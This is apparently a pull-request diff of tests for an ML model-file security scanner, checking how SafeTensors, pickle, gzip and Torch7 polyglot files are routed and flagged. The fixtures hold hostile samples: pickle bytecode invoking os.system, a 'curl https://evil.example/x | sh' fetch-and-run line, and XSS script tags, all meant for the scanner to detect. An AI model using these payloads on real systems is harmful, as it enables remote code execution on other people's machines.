+    safetensors_path = tmp_path / "known-type-invalid-pickle.unknown"
+    _write_safetensors_pickle_tail(safetensors_path, ord("V"), b"\n0" + pickle_body)
+
+    assert file_detection.detect_file_format(str(safetensors_path)) == "safetensors"
+    assert file_detection.detect_file_format_from_magic(str(safetensors_path)) == "safetensors"
+    assert file_detection.detect_file_format_for_skip_filter(str(safetensors_path)) == "safetensors"
+
+    result = scan_file(str(safetensors_path), config={"cache_enabled": False})
+
+    assert result.scanner_name == "safetensors"
+    assert result.success is True
+    assert not result.issues
+
+
+def test_scan_file_routes_none_state_build_safetensors_overlap_to_pickle(tmp_path: Path) -> None:
+    pickle_tail = b"\n0NNbcos\nsystem\n(Vtrue\ntR."
+    polyglot = tmp_path / "none-state-build-pickle.unknown"
+    _write_safetensors_pickle_tail(polyglot, ord("V"), pickle_tail)
+
+    assert file_detection.detect_file_format(str(polyglot)) == "pickle"
+    assert file_detection.detect_file_format_from_magic(str(polyglot)) == "pickle"
+    assert file_detection.detect_file_format_for_skip_filter(str(polyglot)) == "pickle"
+
+    result = scan_file(str(polyglot), config={"cache_enabled": False})
+
+    assert result.scanner_name == "pickle"
+    _assert_system_pickle_issue(result)
+
+
+def test_scan_file_merges_safetensors_findings_for_pickle_overlap(tmp_path: Path) -> None:
+    pickle_tail = b"\n0cos\nsystem\n(Vtrue\ntR."
+    polyglot = tmp_path / "metadata-and-pickle.unknown"
+    _write_safetensors_pickle_tail(
+        polyglot,
+        0x0156,
+        pickle_tail,
+        custom_metadata={"note": "<script>alert(1)</script>"},
+    )
+
+    result = scan_file(str(polyglot), config={"cache_enabled": False})
+
+    assert result.scanner_name == "pickle"
+    assert "safetensors" in result.metadata["supplemental_scanners"]
+    _assert_system_pickle_issue(result)
+    assert any(check.name == "SafeTensors XSS/HTML Injection Detection" for check in result.checks)
+
+    safetensors_only_result = scan_file(
+        str(polyglot),
+        config={"cache_enabled": False, "scanners": ["safetensors"]},
+    )
+    assert any(check.name == "SafeTensors XSS/HTML Injection Detection" for check in safetensors_only_result.checks)
+    assert safetensors_only_result.success is False
+
+
+@pytest.mark.parametrize("opcode", [b"B", b"X"], ids=["binbytes", "binunicode"])
+def test_scan_file_routes_oversized_pickle_safetensors_polyglot_to_pickle(
+    tmp_path: Path,
+    opcode: bytes,
+) -> None:
+    polyglot = tmp_path / "oversized.unknown"
+    _write_oversized_pickle_safetensors_polyglot(polyglot, opcode)
+
+    with polyglot.open("rb") as handle:
+        header_length = struct.unpack("<Q", handle.read(8))[0]
+        assert handle.read(1) == b"{"
+    assert header_length > SAFETENSORS_ROUTING_HEADER_PARSE_BYTES
+    assert file_detection.detect_file_format(str(polyglot)) == "pickle"
+    assert file_detection.detect_file_format_from_magic(str(polyglot)) == "pickle"
+    assert file_detection.detect_file_format_for_skip_filter(str(polyglot)) == "pickle"
+
+    result = scan_file(str(polyglot), config={"cache_enabled": False})
+
+    assert result.scanner_name == "pickle"
+    _assert_system_pickle_issue(result)
+
+
+def test_scan_file_routes_valid_gzip_safetensors_polyglot_to_compressed(tmp_path: Path) -> None:
+    polyglot = tmp_path / "gzip-safetensors-polyglot.py.gz"
+    _write_gzip_safetensors_polyglot(polyglot)
+
+    assert file_detection.detect_file_format(str(polyglot)) == "compressed"
+    assert file_detection.detect_file_format_from_magic(str(polyglot)) == "gzip"
+    assert file_detection.detect_file_format_for_skip_filter(str(polyglot)) == "gzip"
+
+    result = scan_file(str(polyglot), config={"cache_enabled": False})
+
+    assert result.scanner_name == "compressed"
+    assert "safetensors" in result.metadata["supplemental_scanners"]
+    assert any(check.name == "SafeTensors XSS/HTML Injection Detection" for check in result.checks)
+    assert any(
+        check.name == "Python Archive Member Security"
+        and check.status == CheckStatus.FAILED
+        and "os.system" in check.message
+        for check in result.checks
+    )
+
+
+@pytest.mark.parametrize(
+    "trailing_data",
+    [b"benign trailing safetensors bytes", b"\x1f\x8bBAD gzip-like trailing bytes"],
+    ids=["ordinary", "invalid-gzip-prefix"],
+)
+def test_scan_file_keeps_gzip_prefix_with_trailing_safetensors_data_clean(
+    tmp_path: Path,
+    trailing_data: bytes,
+) -> None:
+    polyglot = tmp_path / "gzip-prefix-safetensors.unknown"
+    _write_gzip_safetensors_polyglot(
+        polyglot,
+        include_xss=False,
+        include_python_payload=False,
+        trailing_data=trailing_data,
+    )
+
+    assert file_detection.detect_file_format(str(polyglot)) == "safetensors"
+    assert file_detection.detect_file_format_from_magic(str(polyglot)) == "safetensors"
+    assert file_detection.detect_file_format_for_skip_filter(str(polyglot)) == "safetensors"
+
+    result = scan_file(str(polyglot), config={"cache_enabled": False})
+
+    assert result.scanner_name == "safetensors"
+    assert result.success is True
+    assert not result.issues
+
+
+def test_scan_file_detects_python_in_gzip_safetensors_with_nonmember_trailing_data(tmp_path: Path) -> None:
+    polyglot = tmp_path / "gzip-python-trailing-safetensors.unknown"
+    _write_gzip_safetensors_polyglot(
+        polyglot,
+        include_xss=False,
+        trailing_data=b"benign trailing safetensors bytes",
+    )
+
+    assert file_detection.detect_file_format(str(polyglot)) == "safetensors"
+    assert file_detection.detect_file_format_from_magic(str(polyglot)) == "safetensors"
+    assert file_detection.detect_file_format_for_skip_filter(str(polyglot)) == "safetensors"
+
+    result = scan_file(str(polyglot), config={"cache_enabled": False})
+
+    assert result.scanner_name == "safetensors"
+    assert "compressed" in result.metadata["supplemental_scanners"]
+    assert any(
+        check.name == "Python Archive Member Security"
+        and check.status == CheckStatus.FAILED
+        and "os.system" in check.message
+        for check in result.checks
+    )
+
+    aggregate = scan_model_directory_or_file(str(polyglot), cache_enabled=False)
+    assert determine_exit_code(aggregate) == 1
+
+
+def test_scan_file_keeps_zero_prefixed_nonmember_gzip_trailing_data_clean(tmp_path: Path) -> None:
+    polyglot = tmp_path / "gzip-zero-prefix-safetensors.unknown"
+    _write_gzip_safetensors_polyglot(
+        polyglot,
+        include_xss=False,
+        include_python_payload=False,
+        trailing_data=(b"\x00" * 4096) + b"benign trailing safetensors bytes",
+    )
+
+    assert file_detection.detect_file_format(str(polyglot)) == "safetensors"
+    assert file_detection.detect_file_format_from_magic(str(polyglot)) == "safetensors"
+    assert file_detection.detect_file_format_for_skip_filter(str(polyglot)) == "safetensors"
+
+    result = scan_file(str(polyglot), config={"cache_enabled": False})
+
+    assert result.scanner_name == "safetensors"
+    assert result.success is True
+    assert not result.issues
+
+
+def test_scan_file_keeps_gzip_zero_padding_security_overlap_compressed(tmp_path: Path) -> None:
+    polyglot = tmp_path / "gzip-padding-safetensors.py.gz"
+    _write_gzip_safetensors_polyglot(
+        polyglot,
+        include_xss=False,
+        trailing_data=b"\x00" * 32,
+    )
+
+    assert gzip.decompress(polyglot.read_bytes())
+    assert file_detection.detect_file_format(str(polyglot)) == "compressed"
+    assert file_detection.detect_file_format_from_magic(str(polyglot)) == "gzip"
+    assert file_detection.detect_file_format_for_skip_filter(str(polyglot)) == "gzip"
+
+    result = scan_file(str(polyglot), config={"cache_enabled": False})
+
+    assert result.scanner_name == "compressed"
+    assert any(
+        check.name == "Compressed Wrapper Stream Decode"
+        and check.status == CheckStatus.FAILED
+        and check.details.get("scan_outcome_reason") == "compressed_stream_decode_failed"
+        for check in result.checks
+    )
+    assert result.success is False
+
+
+def test_scan_file_keeps_late_crc_failure_gzip_safetensors_polyglot_compressed(tmp_path: Path) -> None:
+    polyglot = tmp_path / "crc-failure.py.gz"
+    _write_gzip_safetensors_polyglot(polyglot)
+    payload = bytearray(polyglot.read_bytes())
+    payload[-8] ^= 0x01
+    polyglot.write_bytes(payload)
+
+    assert file_detection.detect_file_format(str(polyglot)) == "compressed"
+    assert file_detection.detect_file_format_from_magic(str(polyglot)) == "gzip"
+    assert file_detection.detect_file_format_for_skip_filter(str(polyglot)) == "gzip"
+
+    result = scan_file(str(polyglot), config={"cache_enabled": False})
+
+    assert result.scanner_name == "compressed"
+    assert result.success is False
+
+
+def test_scan_file_merges_torch7_and_safetensors_overlap_findings(tmp_path: Path) -> None:
+    header_length = 0x3754
+    metadata = json.dumps(
+        {
+            "__metadata__": {
+                "note": (
+                    "torch.FloatTensor nn.Sequential cmd = os.execute('curl https://evil.example/x | sh') "
+                    "<script>alert(1)</script>"
+                )
+            },
+            "tensor": {"dtype": "U8", "shape": [1], "data_offsets": [0, 1]},
+        },
+        separators=(",", ":"),
+    ).encode()
+    polyglot = tmp_path / "torch7-safetensors.unknown"
+    polyglot.write_bytes(
+        struct.pack("<Q", header_length) + metadata + (b" " * (header_length - len(metadata))) + b"\x00"
+    )
+
+    result = scan_file(str(polyglot), config={"cache_enabled": False})
+
+    assert result.scanner_name == "safetensors"
+    assert result.metadata["supplemental_scanners"] == ["torch7"]
+    assert any(check.name == "SafeTensors XSS/HTML Injection Detection" for check in result.checks)
+    assert any(
+        check.name == "Torch7 Lua Execution Primitive Analysis" and check.status == CheckStatus.FAILED
+        for check in result.checks
+    )
+    assert result.success is False
+
+
+def test_nested_scan_merges_safetensors_findings_for_gzip_overlap(tmp_path: Path) -> None:
+    polyglot = tmp_path / "nested-gzip-safetensors.unknown"
+    _write_gzip_safetensors_polyglot(polyglot)
+
+    result = archive_dispatch.scan_nested_file(
+        str(polyglot),
+        config={"cache_enabled": False, "_archive_depth": 1},
+    )
+
+    assert result.scanner_name == "compressed"
+    assert "safetensors" in result.metadata["supplemental_scanners"]
+    assert any(check.name == "SafeTensors XSS/HTML Injection Detection" for check in result.checks)
+    assert result.success is False
+
+
+def test_outer_safetensors_analysis_not_suppressed_by_child_metadata(tmp_path: Path) -> None:
+    child = tmp_path / "child.unknown"
+    _write_safetensors_pickle_tail(
+        child,
+        0x0156,
+        b"\n0cbuiltins\nset\n.",
+    )
+    child_member = gzip.compress(child.read_bytes(), mtime=0)
+    outer = tmp_path / "outer.gz"
+    _write_gzip_safetensors_polyglot(
+        outer,
+        include_python_payload=False,
+        trailing_data=child_member,
+    )
+
+    assert file_detection.detect_file_format(str(child)) == "pickle"
+    assert file_detection.has_safetensors_routing_candidate(str(outer))
+    assert file_detection.detect_file_format(str(outer)) == "compressed"
+
+    result = scan_file(str(outer), config={"cache_enabled": False})
+
+    assert result.scanner_name == "compressed"
+    assert any(
+        check.name == "SafeTensors XSS/HTML Injection Detection" and check.status == CheckStatus.FAILED
+        for check in result.checks
+    )
+    assert result.success is False
+
+    aggregate = scan_model_directory_or_file(str(outer), cache_enabled=False)
+    assert determine_exit_code(aggregate) == 1
+
+
+def test_nested_scan_merges_torch7_and_safetensors_overlap_findings(tmp_path: Path) -> None:
+    header_length = 0x3754
+    metadata = json.dumps(
+        {
+            "__metadata__": {
+                "note": (
+                    "torch.FloatTensor nn.Sequential cmd = os.execute('curl https://evil.example/x | sh') "
+                    "<script>alert(1)</script>"
+                )
+            },
+            "tensor": {"dtype": "U8", "shape": [1], "data_offsets": [0, 1]},
+        },
+        separators=(",", ":"),
+    ).encode()
+    polyglot = tmp_path / "nested-torch7-safetensors.unknown"
+    polyglot.write_bytes(
+        struct.pack("<Q", header_length) + metadata + (b" " * (header_length - len(metadata))) + b"\x00"
+    )
+
+    result = archive_dispatch.scan_nested_file(
+        str(polyglot),
+        config={"cache_enabled": False, "_archive_depth": 1},
+    )
+
+    assert result.scanner_name == "safetensors"
+    assert result.metadata["supplemental_scanners"] == ["torch7"]
+    assert any(check.name == "SafeTensors XSS/HTML Injection Detection" for check in result.checks)
+    assert any(
+        check.name == "Torch7 Lua Execution Primitive Analysis" and check.status == CheckStatus.FAILED
+        for check in result.checks
+    )
+    assert result.success is False
+
+
+def test_scan_file_merges_safetensors_findings_after_zip_preflight_rejection(tmp_path: Path) -> None:
+    archive_buffer = io.BytesIO()
+    with zipfile.ZipFile(archive_buffer, "w") as archive:
+        archive.writestr("first.txt", b"one")
+        archive.writestr("second.txt", b"two")
+    tensor_data = archive_buffer.getvalue()
+    header_length = 512
+    metadata = json.dumps(
+        {
+            "__metadata__": {"note": "<script>alert(1)</script>"},
+            "tensor": {
+                "dtype": "U8",
+                "shape": [len(tensor_data)],
+                "data_offsets": [0, len(tensor_data)],
+            },
+        },
+        separators=(",", ":"),
+    ).encode()
+    polyglot = tmp_path / "zip-preflight-safetensors.unknown"
+    polyglot.write_bytes(
+        struct.pack("<Q", header_length) + metadata + (b" " * (header_length - len(metadata))) + tensor_data
+    )
+
+    result = scan_file(
+        str(polyglot),
+        config={"cache_enabled": False, "max_zip_entries": 1},
+    )
+
+    assert result.scanner_name == "zip"
+    assert "safetensors" in result.metadata["supplemental_scanners"]
+    assert any(issue.rule_code == "S410" for issue in result.issues)
+    assert any(check.name == "SafeTensors XSS/HTML Injection Detection" for check in result.checks)
+    assert "_zip_container_dispatched_paths" not in result.to_dict()["metadata"]
+    assert result.success is False
 
 
 def test_scan_file_routes_protocolless_binary_pickle_with_misleading_extension(tmp_path: Path) -> None:
@@ -5015,6 +6084,29 @@ def test_scan_file_prefers_hdf5_and_preserves_safetensors_userblock_analysis(
     )
 
 
+def test_nested_scan_prefers_hdf5_and_preserves_safetensors_userblock_analysis(
+    tmp_path: Path,
+    monkeypatch: pytest.MonkeyPatch,
+) -> None:
+    polyglot = tmp_path / "nested-safetensors-userblock.safetensors"
+    _write_safetensors_hdf5_userblock_candidate(polyglot, plausible=True)
+    monkeypatch.setattr("modelaudit.scanners.keras_h5_scanner.HAS_H5PY", False)
+
+    result = archive_dispatch.scan_nested_file(
+        str(polyglot),
+        config={"cache_scan_results": False, "_archive_depth": 1},
+    )
+
+    assert result.scanner_name == "keras_h5"
+    assert result.success is False
+    assert "keras_h5_h5py_unavailable" in result.metadata["scan_outcome_reasons"]
+    assert result.metadata["supplemental_scanners"] == ["safetensors"]
+    assert any(check.name == "H5PY Library Check" for check in result.checks)
+    assert any(
+        check.name == "Header Length Validation" and check.status == CheckStatus.PASSED for check in result.checks
+    )
+
+
 def test_scan_file_keeps_malformed_hdf5_safetensors_near_match_on_safetensors_route(tmp_path: Path) -> None:
     near_match = tmp_path / "safetensors-near-match.safetensors"
     _write_safetensors_hdf5_userblock_candidate(near_match, plausible=False)
@@ -7081,18 +8173,12 @@ def test_scan_top_level_oversized_renamed_safetensors_fails_before_hashing(
     assert any(check.name == "Header Size Limit" for check in result.checks)
 
 
-@pytest.mark.parametrize(
-    ("filename", "header_prefix"),
-    [("overlap.jpg", b"{}"), ("overlap.safetensors", b"x")],
-)
 def test_tensorflow_inconclusive_safetensors_overlap_fails_closed_without_hashing(
     tmp_path: Path,
     monkeypatch: pytest.MonkeyPatch,
-    filename: str,
-    header_prefix: bytes,
 ) -> None:
-    payload = tmp_path / filename
-    _write_tensorflow_overlap_safetensors_candidate(payload, header_prefix)
+    payload = tmp_path / "overlap.safetensors"
+    _write_tensorflow_overlap_safetensors_candidate(payload, b"x")
     cache_dir = tmp_path / "cache"
     config = {
         "cache_enabled": True,
@@ -7137,6 +8223,26 @@ def test_tensorflow_inconclusive_safetensors_overlap_fails_closed_without_hashin
         assert get_cache_manager(str(cache_dir), enabled=True).get_stats()["total_entries"] == 0
     finally:
         reset_cache_manager()
+
+
+def test_valid_safetensors_framing_precedes_ambiguous_tensorflow_probe(tmp_path: Path) -> None:
+    payload = tmp_path / "tensorflow-prefix-safetensors.unknown"
+    header_length = int.from_bytes(bytes([0x08, 0x01, 0x79, 0, 0, 0, 0, 0]), "little")
+    metadata = json.dumps(
+        {"t": {"dtype": "U8", "shape": [1], "data_offsets": [0, 1]}},
+        separators=(",", ":"),
+    ).encode()
+    payload.write_bytes(struct.pack("<Q", header_length) + metadata + (b" " * (header_length - len(metadata))) + b"X")
+
+    assert file_detection.detect_file_format(str(payload)) == "safetensors"
+    assert file_detection.detect_file_format_from_magic(str(payload)) == "safetensors"
+    assert file_detection.detect_file_format_for_skip_filter(str(payload)) == "safetensors"
+
+    result = scan_file(str(payload), config={"cache_enabled": False})
+
+    assert result.scanner_name == "safetensors"
+    assert result.success is True
+    assert not result.issues
 
 
 def test_scan_file_routes_misnamed_gguf_by_header(tmp_path: Path) -> None:

--- a/tests/test_scanner_selection.py
+++ b/tests/test_scanner_selection.py
@@ -734,6 +734,29 @@ def test_pickle_routing_inconclusive_format_maps_to_pickle_scanner() -> None:
     assert scanner_ids_for_detected_format(PICKLE_ROUTING_INCONCLUSIVE_FORMAT) == frozenset({"pickle"})
 
 
+def test_remote_safetensors_route_preserves_possible_overlap_scanners() -> None:
+    scanner_ids = scanner_ids_for_detected_format("safetensors")
+
+    assert scanner_ids == frozenset(
+        {
+            "compressed",
+            "executorch",
+            "keras_h5",
+            "keras_zip",
+            "llamafile",
+            "numpy",
+            "pickle",
+            "pytorch_zip",
+            "safetensors",
+            "skops",
+            "torch7",
+            "torchserve_mar",
+            "weight_distribution",
+            "zip",
+        }
+    )
+
+
 def test_remote_prefilters_preserve_selected_extensionless_scanners() -> None:
     policy = resolve_scanner_selection_policy(scanners=["llamafile"])
     extensions = selected_scanner_extensions(policy, conservative=True)

--- a/tests/utils/file/test_filetype.py
+++ b/tests/utils/file/test_filetype.py
@@ -712,6 +712,96 @@ def test_detect_protocolless_pickle_shaped_safetensors_header_remains_safetensor
     assert detect_file_format(str(safetensors_path)) == "safetensors"
 
 
+@pytest.mark.parametrize(
+    ("header_length", "magic"),
+    [(0x88B1F, b"\x1f\x8b\x08\x00"), (0x9C78, b"\x78\x9c"), (0x3754, b"T7\x00\x00")],
+    ids=["invalid-gzip", "decoder-invalid-zlib", "marker-only-torch7"],
+)
+def test_detect_valid_safetensors_framing_precedes_invalid_weak_magic(
+    tmp_path: Path,
+    header_length: int,
+    magic: bytes,
+) -> None:
+    metadata = b'{"tensor":{"dtype":"U8","shape":[1],"data_offsets":[0,1]}}'
+    metadata += b" " * (header_length - len(metadata))
+    safetensors_path = tmp_path / "weak-magic.unknown"
+    safetensors_path.write_bytes(struct.pack("<Q", header_length) + metadata + b"\x00")
+
+    assert safetensors_path.read_bytes().startswith(magic)
+    assert detect_file_format_from_magic(str(safetensors_path)) == "safetensors"
+    assert detect_file_format_for_skip_filter(str(safetensors_path)) == "safetensors"
+    assert detect_file_format(str(safetensors_path)) == "safetensors"
+
+
+def test_detect_structural_torch7_safetensors_overlap_retains_safetensors_owner(tmp_path: Path) -> None:
+    header_length = 0x3754
+    metadata = json.dumps(
+        {
+            "__metadata__": {
+                "note": (
+                    "torch.FloatTensor nn.Sequential cmd = os.execute('curl https://evil.example/x | sh') "
+                    "<script>alert(1)</script>"
+                )
+            },
+            "tensor": {"dtype": "U8", "shape": [1], "data_offsets": [0, 1]},
+        },
+        separators=(",", ":"),
+    ).encode()
+    metadata += b" " * (header_length - len(metadata))
+    polyglot = tmp_path / "structural-torch7.unknown"
+    polyglot.write_bytes(struct.pack("<Q", header_length) + metadata + b"\x00")
+
+    assert detect_file_format_from_magic(str(polyglot)) == "safetensors"
+    assert detect_file_format_for_skip_filter(str(polyglot)) == "safetensors"
+    assert detect_file_format(str(polyglot)) == "safetensors"
+
+
+def test_detect_preset_dictionary_zlib_safetensors_overlap_retains_compression(tmp_path: Path) -> None:
+    header_length = 0x2078
+    metadata = b'{"tensor":{"dtype":"U8","shape":[1],"data_offsets":[0,1]}}'
+    metadata += b" " * (header_length - len(metadata))
+    polyglot = tmp_path / "zlib-dictionary-candidate.unknown"
+    polyglot.write_bytes(struct.pack("<Q", header_length) + metadata + b"\x00")
+
+    assert polyglot.read_bytes()[:2] == b"\x78\x20"
+    assert detect_file_format_from_magic(str(polyglot)) == "zlib"
+    assert detect_file_format_for_skip_filter(str(polyglot)) == "zlib"
+    assert detect_file_format(str(polyglot)) == "zlib"
+
+
+def test_oversized_safetensors_compression_probe_keeps_small_bound(
+    tmp_path: Path,
+    monkeypatch: pytest.MonkeyPatch,
+) -> None:
+    candidate = tmp_path / "oversized-bzip2-candidate.unknown"
+    prefix = b"BZh1\x00\x00\x00\x00"
+    header_length = int.from_bytes(prefix, "little")
+    with candidate.open("wb") as handle:
+        handle.write(prefix + b"{")
+        handle.truncate(8 + header_length + 1)
+
+    probe_limits: list[int] = []
+
+    def record_probe_limit(
+        _path: Path,
+        _file_size: int,
+        _compression_format: str,
+        *,
+        probe_limit: int,
+    ) -> None:
+        probe_limits.append(probe_limit)
+
+    monkeypatch.setattr(file_detection, "_probe_compression_prefix", record_probe_limit)
+
+    assert file_detection._compression_route_precedes_safetensors(
+        candidate,
+        prefix,
+        candidate.stat().st_size,
+        "bzip2",
+    )
+    assert probe_limits == [PROTO0_1_MAX_PROBE_BYTES]
+
+
 def test_detect_file_format_from_magic_json_not_misrouted_as_safetensors(tmp_path: Path) -> None:
     json_path = tmp_path / "config.unknown"
     json_path.write_text('{"name":"model","version":1}', encoding="utf-8")
@@ -2502,6 +2592,37 @@ def test_detect_file_format_probe_boundary_prefixed_proto0_pickle(tmp_path: Path
 
     assert detect_file_format(str(payload)) == "pickle"
     assert detect_file_format_from_magic(str(payload)) == "pickle"
+
+
+def test_streamed_pickle_nested_frame_uses_actual_raw_resume_offset(tmp_path: Path) -> None:
+    global_reference = b"cos\nsystem\n."
+    nominal_candidate = bytearray(b"\xff" * 80)
+    nominal_candidate[:20] = b"\x95" + struct.pack("<Q", 10) + b"\x95" + struct.pack("<Q", 3) + b"N."
+    nominal_candidate[21 : 21 + len(global_reference)] = global_reference
+
+    raw_resume_candidate = bytearray(b"\xff" * 80)
+    raw_resume_candidate[:18] = b"\x95" + struct.pack("<Q", 10) + b"\x95" + struct.pack("<Q", 4)
+    raw_resume_candidate[19:23] = b"N.\x00\x00"
+    raw_resume_candidate[23 : 23 + len(global_reference)] = global_reference
+
+    operand = b"x" * (PROTO0_1_MAX_PROBE_BYTES + 1)
+    prefix = b"B" + struct.pack("<I", len(operand)) + operand + b"0"
+    for name, candidate, expected in (
+        ("nominal", nominal_candidate, False),
+        ("raw-resume", raw_resume_candidate, True),
+    ):
+        path = tmp_path / f"nested-frame-{name}.pkl"
+        payload = prefix + candidate
+        path.write_bytes(payload)
+
+        assert (
+            file_detection._has_bounded_protocolless_binary_pickle_security_signal(
+                path,
+                len(payload),
+                payload[:16],
+            )
+            is expected
+        )
 
 
 def test_detect_file_format_trivial_probe_boundary_prefix_not_pickle(tmp_path: Path) -> None:

--- a/tests/utils/file/test_filetype.py
+++ b/tests/utils/file/test_filetype.py
@@ -699,6 +699,19 @@ def test_detect_pickle_shaped_safetensors_header_remains_safetensors(tmp_path: P
     assert detect_file_format(str(safetensors_path)) == "safetensors"
 
 
+def test_detect_protocolless_pickle_shaped_safetensors_header_remains_safetensors(tmp_path: Path) -> None:
+    header_length = 0x2E93
+    metadata = b'{"tensor":{"dtype":"U8","shape":[1],"data_offsets":[0,1]}}'
+    metadata += b" " * (header_length - len(metadata))
+    safetensors_path = tmp_path / "protocolless-pickle-shaped-header.unknown"
+    safetensors_path.write_bytes(struct.pack("<Q", header_length) + metadata + b"\x00")
+
+    assert safetensors_path.read_bytes()[:2] == b"\x93."
+    assert detect_file_format_from_magic(str(safetensors_path)) == "safetensors"
+    assert detect_file_format_for_skip_filter(str(safetensors_path)) == "safetensors"
+    assert detect_file_format(str(safetensors_path)) == "safetensors"
+
+
 def test_detect_file_format_from_magic_json_not_misrouted_as_safetensors(tmp_path: Path) -> None:
     json_path = tmp_path / "config.unknown"
     json_path.write_text('{"name":"model","version":1}', encoding="utf-8")

--- a/tests/utils/sources/test_cloud_storage.py
+++ b/tests/utils/sources/test_cloud_storage.py
@@ -2752,8 +2752,25 @@ def test_download_from_cloud_isolates_selective_directory_cache_by_scanner_selec
     assert safetensors_path != pickle_path
     assert cached_pickle_path == pickle_path
     assert {path.name for path in safetensors_path.iterdir()} == {"weights.safetensors"}
-    assert {path.name for path in pickle_path.iterdir()} == {"model.pkl"}
-    assert [call.args[0] for call in fs.get.call_args_list] == list(payloads)
+    assert {path.name for path in pickle_path.iterdir()} == {"model.pkl", "weights.safetensors"}
+    assert [call.args[0] for call in fs.get.call_args_list] == [
+        "s3://bucket/models/weights.safetensors",
+        "s3://bucket/models/model.pkl",
+        "s3://bucket/models/weights.safetensors",
+    ]
+
+
+def test_cloud_directory_cache_scope_versions_selective_routing() -> None:
+    scope = _cloud_directory_cache_scope(
+        {"type": "directory"},
+        selective=True,
+        scannable_extensions={".pkl", ".safetensors"},
+        scannable_filenames=None,
+        scanner_selection=resolve_scanner_selection_policy(scanners=["pickle"]).to_config(),
+    )
+
+    assert scope is not None
+    assert json.loads(scope)["routing_version"] == 2
 
 
 @patch("fsspec.filesystem")


### PR DESCRIPTION
## Summary

- recognize validated SafeTensors framing before protocol-less pickle probing
- preserve malicious protocol-less pickle routing
- add a regression for a SafeTensors header length that decodes as `STACK_GLOBAL; STOP`

## Campaign evidence

The Hugging Face campaign found valid SafeTensors shards routed as pickle or `pickle_routing_inconclusive` because the little-endian header length also formed a protocol-less pickle prefix. The strong SafeTensors frame validation was only reached after the weaker pickle probe.

This is separate from the zlib collision fixed in #1610.

## Validation

- regression fails on `origin/main`: `detect_file_format(...) == "pickle"`
- `pytest -q tests/utils/file/test_filetype.py tests/test_core.py -k 'protocolless or pickle_shaped_safetensors'` (`37 passed`)
- Ruff format and lint pass on changed Python files
- mypy passes on changed Python files
